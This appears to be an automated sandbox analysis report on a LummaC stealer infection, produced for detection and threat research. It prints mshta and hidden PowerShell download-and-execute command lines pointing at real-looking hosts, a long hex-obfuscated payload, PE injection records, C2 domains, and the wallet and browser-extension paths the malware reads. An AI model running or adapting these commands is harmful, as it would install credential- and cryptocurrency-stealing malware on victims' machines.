Source: mshta.exe, 00000002.00000003.56231710859.00000000031AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56233772606.0000000003141000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.56249468249.00000000031BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56246926292.00000000031B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56246272360.00000000031AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.56249325888.0000000003142000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.57431193652.00000000005EC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.57431193652.0000000000629000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: mshta.exe, 00000002.00000002.56249325888.000000000317A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56233772606.000000000317A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWl
Source: powershell.exe, 00000003.00000002.56226903813.00000000081E6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.56223425893.0000000006DBB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.57195069753.0000000007040000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57276916511.00000218857F7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_0043C1F0 LdrInitializeThunk, 8_2_0043C1F0
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: amsi32_2576.amsi.csv, type: OTHER
Source: Yara match File source: amsi32_8336.amsi.csv, type: OTHER
Source: Yara match File source: Process Memory Space: powershell.exe PID: 2576, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 8336, type: MEMORYSTR
Bypasses PowerShell execution policy
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://journal.liveview.pw/singl6.vsdx'))"
Injects a PE file into a foreign processes
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 400000 value starts with: 4D5A Jump to behavior
LummaC encrypted strings found
Source: powershell.exe String found in binary or memory: rapeflowwj.lat
Source: powershell.exe String found in binary or memory: crosshuaht.lat
Source: powershell.exe String found in binary or memory: sustainskelet.lat
Source: powershell.exe String found in binary or memory: aspecteirs.lat
Source: powershell.exe String found in binary or memory: energyaffai.lat
Source: powershell.exe String found in binary or memory: necklacebudi.lat
Source: powershell.exe String found in binary or memory: discokeyus.lat
Source: powershell.exe String found in binary or memory: grannyejh.lat
Source: powershell.exe String found in binary or memory: surmisehotte.click
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\mshta.exe "C:\WINDOWS\system32\mshta.exe" https://savecoupons.shop/singl6.mp4 Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function cDnCn($pBla){return -split ($pBla -replace '..', '0x$& ')};$Lhmk = cDnCn('A3AA4480FF655084E70ADC84D9EA6341178CCA80AF8469B12931F471AF827F36734F649E4FFC481465F7A8A2BFA75783C467F30497BC4B11E481C2530797B14FC2F5B368B22016A880E652482E6475CF0DC1A66EA8F0136B2BBC629A30CEB860956FD49362AEC1529369252FC290E7464876570EB817D8E9B180D541376938391A342371D8EEE7C40B429917ED3BAE7546609A8390B670A9097CB2F4371F68C266424FC610C85C530E515400B772D500AE542F889F9A970F0C0884F9DAB2F28BCD379149C803B7F17EEC6C69E622BA1F8B13247111CF1CCB79B4798B7DFB6AEC68A8F963D9FE6AC1AF1987A9FB2A16B0F82B9BA594307ADEEA757F6284F08DDB1A3BFA98B3BEA493C2C605A6EBF27BFDF963BEF1C0F74C61BB82B80E6A9B2F61E44AC18908A15AC5CA52E0D0B5E7ECA5C629F9CE088140C02670105B1C1EB4C39C449DED3A8E098E14832E1159B7BFE7F74012F5AB28A812BD11B0830216EC8E5F537AD27755CAD7EFBDAEB4C5E6235233729039ACA656A57FB2D8AFEF2960E070779A4CF1BD35291B7033D4618B7FBEC36B04BDD9CC6D825285FE8E9B14F783B7F3071ABE49F6BE8DFE02D7E8B0A4E5FEAD8570B4049362BC3FF9599BEF08430DEA16A596C8E8AA8FEBE25A7D3AEF1A0F1D2A47644C59B18A95C4E955B6A747C547978A1471BD6004B1ECD6443ABC8058ED921C2A97C1449AE376C36FB9DA81ED841F3F4437F69417CEF04ACD68C114464AA5755262E3E2A8804F5D1F018C94308E1802E6C59864386DF18AC9D197902C482A57D3531FCB49886B15046AF78768F80014DE486E0E78D49561586C41C0E653A2A6BB84F1D7467BB73BF1E6FF73E92540FCC809AA398E26B9A708706094D4A5382850472779AD17B69C066B29CAAE8B04F605E50CC29E8480DD31E8DB08E7717139D5A19EE210804AD16CA1445A2EAC4D7C66209914C86431F3B5174ECE947BEBD88F70D5299D63C267D52D0EA77D645EBCDD39A110138C082CD3C09CA8AA75E9A53A689D0576C332EE23948AE9ECCCE522DACC38B3581F9C71CFC27C56F81F9CB5C9D938E2A35C15A5E7CE4C1DB70B003BF969AB7131336F933529CEA80A9FACB8C911FDA0C526986D4E8FB5FDDDA4C0DF5762BE3783933E8E0AB3D712CD3B563309BDB03A5460E12D1C34126A4F89191E1C34197F7EB35212BAA7E9D32890ED00618DFED16C97F2F709899CAEA84C4AA2A7B5371A5FACA3D115E12BE56D873196999184299302AD235C87C226989D2CBEBA4D82E6C270F060D4165DE6962A5077677A4796A0FC82E05AAB1272F50397568327381A2D529A9466317AB38D192E338BDA14927384DF7CCBAFF9E8594748246285B3D8AA54C12D8C53351947654EA52F7B1A29724A48C14A1D4FCAD70EDC954B5D82A932AC8FF8A2DCB79D1C10C7458B14A40215396E306C046B7DD83B83B6EB6FFAE26FF38DE7E40F09DE9FDD00EC21F89B23814EBBD7E5B2A5AA1A2C0CC6814E4C15D127261B29720A28F854382CC18092685037C23B14ED11E90915036D385992F5D948F9775BB8B9C159C5C39C63E68221BF35A5518331151C4C0BACB7B58F5A8B9DF32BD1C3C4828D65896C8DC07B8002C812E8FED5F8FE86A6138586B9DC1F40F9A4E967D8E87CD674633563F6514E3557D8EFDE3A0247843CCA695357E876D6F77804DCB5599681DA62FAED5D52BA3AB823A2D2219C0783C18FBD3FC8897A07B5FEA483FF46AF5F23EB91E20E31A520B6566B846C91212DECBB9F2E6972ADCAB84A64D2DC6EBFA7B5758A915C3A978589C931CEFE5B8868B0256407FA6B78E518E0B7D7A8042BD51A46F9297518C6F4EB262D6525B016FB7D858136FCBF7AF2BC0D0488BEFD0CED9A5213FF3FF1B7B481CB6454CC9C929EDF1779EEFB9842B90ED62994AE6BD859C94C0821F219C5A77E00C97981C5B1F965E0977F82C3EC531C34 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://journal.liveview.pw/singl6.vsdx'))" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default" Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function cdncn($pbla){return -split ($pbla -replace '..', '0x$& ')};$lhmk = cdncn('a3aa4480ff655084e70adc84d9ea6341178cca80af8469b12931f471af827f36734f649e4ffc481465f7a8a2bfa75783c467f30497bc4b11e481c2530797b14fc2f5b368b22016a880e652482e6475cf0dc1a66ea8f0136b2bbc629a30ceb860956fd49362aec1529369252fc290e7464876570eb817d8e9b180d541376938391a342371d8eee7c40b429917ed3bae7546609a8390b670a9097cb2f4371f68c266424fc610c85c530e515400b772d500ae542f889f9a970f0c0884f9dab2f28bcd379149c803b7f17eec6c69e622ba1f8b13247111cf1ccb79b4798b7dfb6aec68a8f963d9fe6ac1af1987a9fb2a16b0f82b9ba594307adeea757f6284f08ddb1a3bfa98b3bea493c2c605a6ebf27bfdf963bef1c0f74c61bb82b80e6a9b2f61e44ac18908a15ac5ca52e0d0b5e7eca5c629f9ce088140c02670105b1c1eb4c39c449ded3a8e098e14832e1159b7bfe7f74012f5ab28a812bd11b0830216ec8e5f537ad27755cad7efbdaeb4c5e6235233729039aca656a57fb2d8afef2960e070779a4cf1bd35291b7033d4618b7fbec36b04bdd9cc6d825285fe8e9b14f783b7f3071abe49f6be8dfe02d7e8b0a4e5fead8570b4049362bc3ff9599bef08430dea16a596c8e8aa8febe25a7d3aef1a0f1d2a47644c59b18a95c4e955b6a747c547978a1471bd6004b1ecd6443abc8058ed921c2a97c1449ae376c36fb9da81ed841f3f4437f69417cef04acd68c114464aa5755262e3e2a8804f5d1f018c94308e1802e6c59864386df18ac9d197902c482a57d3531fcb49886b15046af78768f80014de486e0e78d49561586c41c0e653a2a6bb84f1d7467bb73bf1e6ff73e92540fcc809aa398e26b9a708706094d4a5382850472779ad17b69c066b29caae8b04f605e50cc29e8480dd31e8db08e7717139d5a19ee210804ad16ca1445a2eac4d7c66209914c86431f3b5174ece947bebd88f70d5299d63c267d52d0ea77d645ebcdd39a110138c082cd3c09ca8aa75e9a53a689d0576c332ee23948ae9eccce522dacc38b3581f9c71cfc27c56f81f9cb5c9d938e2a35c15a5e7ce4c1db70b003bf969ab7131336f933529cea80a9facb8c911fda0c526986d4e8fb5fddda4c0df5762be3783933e8e0ab3d712cd3b563309bdb03a5460e12d1c34126a4f89191e1c34197f7eb35212baa7e9d32890ed00618dfed16c97f2f709899caea84c4aa2a7b5371a5faca3d115e12be56d873196999184299302ad235c87c226989d2cbeba4d82e6c270f060d4165de6962a5077677a4796a0fc82e05aab1272f50397568327381a2d529a9466317ab38d192e338bda14927384df7ccbaff9e8594748246285b3d8aa54c12d8c53351947654ea52f7b1a29724a48c14a1d4fcad70edc954b5d82a932ac8ff8a2dcb79d1c10c7458b14a40215396e306c046b7dd83b83b6eb6ffae26ff38de7e40f09de9fdd00ec21f89b23814ebbd7e5b2a5aa1a2c0cc6814e4c15d127261b29720a28f854382cc18092685037c23b14ed11e90915036d385992f5d948f9775bb8b9c159c5c39c63e68221bf35a5518331151c4c0bacb7b58f5a8b9df32bd1c3c4828d65896c8dc07b8002c812e8fed5f8fe86a6138586b9dc1f40f9a4e967d8e87cd674633563f6514e3557d8efde3a0247843cca695357e876d6f77804dcb5599681da62faed5d52ba3ab823a2d2219c0783c18fbd3fc8897a07b5fea483ff46af5f23eb91e20e31a520b6566b846c91212decbb9f2e6972adcab84a64d2dc6ebfa7b5758a915c3a978589c931cefe5b8868b0256407fa6b78e518e0b7d7a8042bd51a46f9297518c6f4eb262d6525b016fb7d858136fcbf7af2bc0d0488befd0ced9a5213ff3ff1b7b481cb6454cc9c929edf1779eefb9842b90ed62994ae6bd859c94c0821f219c5a77e00c97981c5b1f965e0977f82c3ec531c34
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function cdncn($pbla){return -split ($pbla -replace '..', '0x$& ')};$lhmk = cdncn('a3aa4480ff655084e70adc84d9ea6341178cca80af8469b12931f471af827f36734f649e4ffc481465f7a8a2bfa75783c467f30497bc4b11e481c2530797b14fc2f5b368b22016a880e652482e6475cf0dc1a66ea8f0136b2bbc629a30ceb860956fd49362aec1529369252fc290e7464876570eb817d8e9b180d541376938391a342371d8eee7c40b429917ed3bae7546609a8390b670a9097cb2f4371f68c266424fc610c85c530e515400b772d500ae542f889f9a970f0c0884f9dab2f28bcd379149c803b7f17eec6c69e622ba1f8b13247111cf1ccb79b4798b7dfb6aec68a8f963d9fe6ac1af1987a9fb2a16b0f82b9ba594307adeea757f6284f08ddb1a3bfa98b3bea493c2c605a6ebf27bfdf963bef1c0f74c61bb82b80e6a9b2f61e44ac18908a15ac5ca52e0d0b5e7eca5c629f9ce088140c02670105b1c1eb4c39c449ded3a8e098e14832e1159b7bfe7f74012f5ab28a812bd11b0830216ec8e5f537ad27755cad7efbdaeb4c5e6235233729039aca656a57fb2d8afef2960e070779a4cf1bd35291b7033d4618b7fbec36b04bdd9cc6d825285fe8e9b14f783b7f3071abe49f6be8dfe02d7e8b0a4e5fead8570b4049362bc3ff9599bef08430dea16a596c8e8aa8febe25a7d3aef1a0f1d2a47644c59b18a95c4e955b6a747c547978a1471bd6004b1ecd6443abc8058ed921c2a97c1449ae376c36fb9da81ed841f3f4437f69417cef04acd68c114464aa5755262e3e2a8804f5d1f018c94308e1802e6c59864386df18ac9d197902c482a57d3531fcb49886b15046af78768f80014de486e0e78d49561586c41c0e653a2a6bb84f1d7467bb73bf1e6ff73e92540fcc809aa398e26b9a708706094d4a5382850472779ad17b69c066b29caae8b04f605e50cc29e8480dd31e8db08e7717139d5a19ee210804ad16ca1445a2eac4d7c66209914c86431f3b5174ece947bebd88f70d5299d63c267d52d0ea77d645ebcdd39a110138c082cd3c09ca8aa75e9a53a689d0576c332ee23948ae9eccce522dacc38b3581f9c71cfc27c56f81f9cb5c9d938e2a35c15a5e7ce4c1db70b003bf969ab7131336f933529cea80a9facb8c911fda0c526986d4e8fb5fddda4c0df5762be3783933e8e0ab3d712cd3b563309bdb03a5460e12d1c34126a4f89191e1c34197f7eb35212baa7e9d32890ed00618dfed16c97f2f709899caea84c4aa2a7b5371a5faca3d115e12be56d873196999184299302ad235c87c226989d2cbeba4d82e6c270f060d4165de6962a5077677a4796a0fc82e05aab1272f50397568327381a2d529a9466317ab38d192e338bda14927384df7ccbaff9e8594748246285b3d8aa54c12d8c53351947654ea52f7b1a29724a48c14a1d4fcad70edc954b5d82a932ac8ff8a2dcb79d1c10c7458b14a40215396e306c046b7dd83b83b6eb6ffae26ff38de7e40f09de9fdd00ec21f89b23814ebbd7e5b2a5aa1a2c0cc6814e4c15d127261b29720a28f854382cc18092685037c23b14ed11e90915036d385992f5d948f9775bb8b9c159c5c39c63e68221bf35a5518331151c4c0bacb7b58f5a8b9df32bd1c3c4828d65896c8dc07b8002c812e8fed5f8fe86a6138586b9dc1f40f9a4e967d8e87cd674633563f6514e3557d8efde3a0247843cca695357e876d6f77804dcb5599681da62faed5d52ba3ab823a2d2219c0783c18fbd3fc8897a07b5fea483ff46af5f23eb91e20e31a520b6566b846c91212decbb9f2e6972adcab84a64d2dc6ebfa7b5758a915c3a978589c931cefe5b8868b0256407fa6b78e518e0b7d7a8042bd51a46f9297518c6f4eb262d6525b016fb7d858136fcbf7af2bc0d0488befd0ced9a5213ff3ff1b7b481cb6454cc9c929edf1779eefb9842b90ed62994ae6bd859c94c0821f219c5a77e00c97981c5b1f965e0977f82c3ec531c34 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
AV process strings found (often used to terminate AV products)
Source: powershell.exe, 00000008.00000002.57437193107.0000000004C66000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Stealing of Sensitive Information
barindex
Yara detected LummaC Stealer
Source: Yara match File source: Process Memory Space: powershell.exe PID: 9160, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: powershell.exe, 00000008.00000002.57431193652.000000000061B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Electrum
Source: powershell.exe, 00000008.00000002.57431193652.000000000061B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/ElectronCash
Source: powershell.exe, 00000008.00000002.57431193652.000000000061B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
Source: powershell.exe, 00000008.00000002.57431193652.0000000000629000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/JAXX New Version
Source: powershell.exe, 00000008.00000002.57431193652.0000000000629000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: powershell.exe, 00000008.00000002.57431193652.0000000000629000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: powershell.exe, 00000008.00000002.57431193652.000000000061B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Ethereum
Source: powershell.exe, 00000003.00000002.56225694102.0000000007590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: sqlcolumnencryptionkeystoreprovider
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\places.sqlite Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cert9.db Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic Jump to behavior
